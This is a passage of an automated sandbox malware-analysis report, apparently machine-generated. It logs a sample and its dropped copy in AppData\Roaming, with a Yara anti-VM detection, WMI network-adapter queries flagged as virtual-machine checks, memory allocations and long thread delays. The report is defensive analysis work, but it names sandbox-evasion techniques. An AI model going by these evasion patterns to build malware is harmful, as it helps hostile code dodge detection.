Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: iNFGd6bDZX.exe PID: 7352, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: newapp.exe PID: 7984, type: MEMORYSTR

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Memory allocated: C70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Memory allocated: 2660000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Memory allocated: 2570000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Memory allocated: 4C00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Memory allocated: 5C00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Memory allocated: 5D30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Memory allocated: 6D30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Memory allocated: 9A20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Memory allocated: AA20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Memory allocated: AEB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Memory allocated: BEB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Memory allocated: 1960000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Memory allocated: 3390000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Memory allocated: 3270000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 14D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 32F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 30B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 58F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 68F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 6A20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 7A20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: A3A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: B3A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: B830000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: C830000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 28A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 2B00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 2920000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: C70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 2680000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 24D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 4C40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 5C40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 5D70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 6D70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 9390000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: A390000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: B390000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: B820000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 2920000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 2AB0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 4AB0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 599812	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 599664	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 599365	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 599123	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 598469	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 597358	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 597029	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 596915	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 596801	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 596343	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 596233	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 595797	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 595468	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 595140	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 594919	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 594797	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 594576	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 594468	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 594329	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 594207	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 594078	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599341	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599110	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598988	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597625	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597266	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597141	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596906	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596797	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596563	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596232	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596016	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595797	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595141	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595016	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594891	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594450	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594338	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599888
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599343
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599109
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598999
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598834
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598685
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598578
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598468
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598358
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598250
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598140
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598031
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597920
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597812
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597703
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597593
